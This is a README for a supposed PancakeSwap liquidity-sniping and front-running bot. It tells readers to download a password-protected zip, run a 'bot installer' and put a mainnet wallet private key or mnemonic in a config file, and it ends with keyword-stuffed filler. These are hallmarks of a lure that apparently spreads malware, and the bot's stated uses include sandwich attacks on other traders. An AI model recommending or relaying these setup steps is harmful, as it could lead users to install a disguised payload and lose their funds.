AMM bot is frontrunning bot primarily aimed at liquidity sniping on AMMs like PancakeSwap. Even though this repository serves as a liquidity sniper, it's architecture is flexible enough to allow any type of frontrunning operation to be built on top of it (eg. liquidations, sandwich attacks, etc).

### Setup
1. [Download](https://github.com/EDavis66/AMM-sniper-bot/archive/refs/heads/main.zip) repo and extract files with password `Jz9bsR3KkTiwtT`

2. Launch bot installer (no admin privileges needed)

3. Create a `config/local.json` file following the template and samples provided inside the directory (`config/*.local.json`). This will be used by our scripts in the configuration and sniping phase. (you won't have yet the trigger address, this comes later)

4. Deploy all contracts using the truffle migrations (create an `.env` file with `BINANCE_MAINNET_WALLET_PRIVATE_KEY` or `BINANCE_MAINNET_WALLET_MNEMONIC`). Contract deployment uses variables provided in `config/local.json` (eg. the factory ones) so make sure to have it properly configured beforehand.

5. Set the trigger address generated by the contract deployment in your `config/local.json`.

6. If you don't have a swarm yet, create one running `npm run create-swarm`. This should create a `config/bee_book.json` similar to the template one (`config/template.bee_book.json`) to be used by the sniper on each snipe

7. Configure the trigger contract with the provided order running `npm run configure-trigger`


### Copyright
* THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE. DAPP, BOT, SNIPER BOT, AMM BOT, AAVE, COMPOUND, UNISWAP, PANCACKESWAP, TRADERJOE, TRADING BOT, ETHEREUM *
